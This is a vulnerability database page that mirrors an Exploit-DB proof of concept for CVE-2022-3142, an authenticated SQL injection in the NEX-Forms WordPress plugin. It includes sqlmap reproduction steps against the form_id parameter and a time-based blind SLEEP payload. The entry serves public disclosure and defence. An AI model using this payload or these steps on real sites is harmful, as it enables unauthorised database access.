Lucene search
+L

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

🗓️ 25 Mar 2023 00:00:00Reported by Elias HohlType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 221 Views

NEX-Forms WordPress plugin - Authenticated SQL injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
WordPress NEX-Forms plugin < 7.9.7 - Authenticated SQL injection Vulnerability
27 Mar 202300:00
zdt
attackerkb
ATTACKERKB
CVE-2022-3142
19 Sep 202214:15
attackerkb
circl
Circl
CVE-2022-3142
19 Sep 202218:38
circl
cnnvd
CNNVD
WordPress plugin NEX-Forms SQL注入漏洞
19 Sep 202200:00
cnnvd
cve
CVE
CVE-2022-3142
19 Sep 202200:00
cve
cvelist
Cvelist
CVE-2022-3142 NEX-Forms < 7.9.7 - Authenticated SQLi
19 Sep 202200:00
cvelist
nuclei
Nuclei
NEX-Forms Plugin < 7.9.7 - SQL Injection
9 Aug 202602:40
nuclei
nvd
NVD
CVE-2022-3142
19 Sep 202214:15
nvd
osv
OSV
CVE-2022-3142
19 Sep 202214:15
osv
packetstorm
Packet Storm
WordPress NEX-Forms SQL Injection
27 Mar 202300:00
packetstorm
Rows per page
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142

Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

1. Start a new Wordpress instance using docker-compose.

2. Install the NEX Forms plugin.

3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.

4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:


Parameter: form_id (GET)
    Type: time-based blind
    Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jul 2023 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.18.8
EPSS0.10977
221